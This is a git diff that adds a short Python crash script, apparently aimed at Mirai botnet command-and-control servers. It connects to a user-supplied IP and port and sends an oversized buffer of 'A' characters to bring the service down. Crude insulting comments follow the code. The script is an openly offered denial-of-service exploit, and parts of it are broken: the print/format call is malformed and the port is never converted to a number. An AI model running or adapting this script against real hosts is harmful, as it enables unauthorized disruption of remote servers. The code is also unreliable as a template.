diff --git a/miraic2-crash b/miraic2-crash new file mode 100644 index 0000000..3c352ee --- /dev/null +++ b/miraic2-crash @@ -0,0 +1,20 @@ + +import socket + +server_ip = input("IP: ") +c2_port = input("C2 Port: ") + +print("Dropping {0}").format(server_ip) +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #opens a TCP socket +c2connection = s.connect((server_ip,c2_port)) +s.send('\x00\x00'+"A"*2600+'\r\n') #sending data +s.close() #closing the TCP socket + + + + +#fuck dickness and vaegene +#SkidWillBeSkid +#everyone can scan and wastes their bots + +